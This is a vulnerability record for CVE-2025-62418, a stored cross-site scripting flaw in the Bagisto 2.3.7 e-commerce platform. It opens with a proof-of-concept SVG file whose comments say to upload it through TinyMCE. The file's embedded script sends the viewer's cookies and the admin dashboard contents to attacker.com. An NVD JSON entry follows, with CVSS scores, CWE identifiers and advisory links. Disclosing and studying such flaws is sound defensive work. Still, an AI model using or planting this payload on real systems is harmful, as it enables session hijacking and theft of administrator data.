CVE-2025-62418

<!-- CVE-2025-62418 PoC: Malicious SVG with embedded JavaScript --> <!-- Upload this file via Bagisto's TinyMCE image upload functionality --> <!-- When viewed by an admin/user, the script executes in their browser context --> <?xml version="1.0" encoding="UTF-8"?> <svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" width="200" height="200"> <script type="text/javascript"> // Steal session cookies or perform privileged actions var img = new Image(); img.src = "https://attacker.com/steal?cookie=" + encodeURIComponent(document.cookie); // Exfiltrate admin page content var xhr = new XMLHttpRequest(); xhr.open("GET", "/admin/dashboard", true); xhr.onreadystatechange = function() { if (xhr.readyState == 4) { var exfil = new Image(); exfil.src = "https://attacker.com/exfil?data=" + encodeURIComponent(xhr.responseText); } }; xhr.send(); </script> <rect x="0" y="0" width="200" height="200" fill="#ffffff"/> <text x="50" y="100" font-family="Arial" font-size="16" fill="#000000">Image</text> </svg>

{"cve": {"id": "CVE-2025-62418", "sourceIdentifier": "[email protected]", "published": "2025-10-16T19:15:34.803", "lastModified": "2025-10-22T16:55:04.337", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Bagisto is an open source laravel eCommerce platform. In Bagisto v2.3.7, the TinyMCE image upload functionality allows an attacker with sufficient privileges (e.g. admin) to upload a crafted SVG file containing embedded JavaScript. When viewed, the malicious code executes in the context of the admin/user’s browser. This vulnerability is fixed in 2.3.8."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:H/I:L/A:N", "baseScore": 6.9, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.7, "impactScore": 4.7}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N", "baseScore": 4.8, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.7, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-80"}, {"lang": "en", "value": "CWE-87"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:webkul:bagisto:2.3.7:*:*:*:*:*:*:*", "matchCriteriaId": "991C244A-9DC2-431C-8ABC-BCF3AE81AD09"}]}]}], "references": [{"url": "https://github.com/bagisto/bagisto/security/advisories/GHSA-fg89-g389-p346", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}, {"url": "https://github.com/bagisto/bagisto/security/advisories/GHSA-fg89-g389-p346", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Vendor Advisory"]}]}}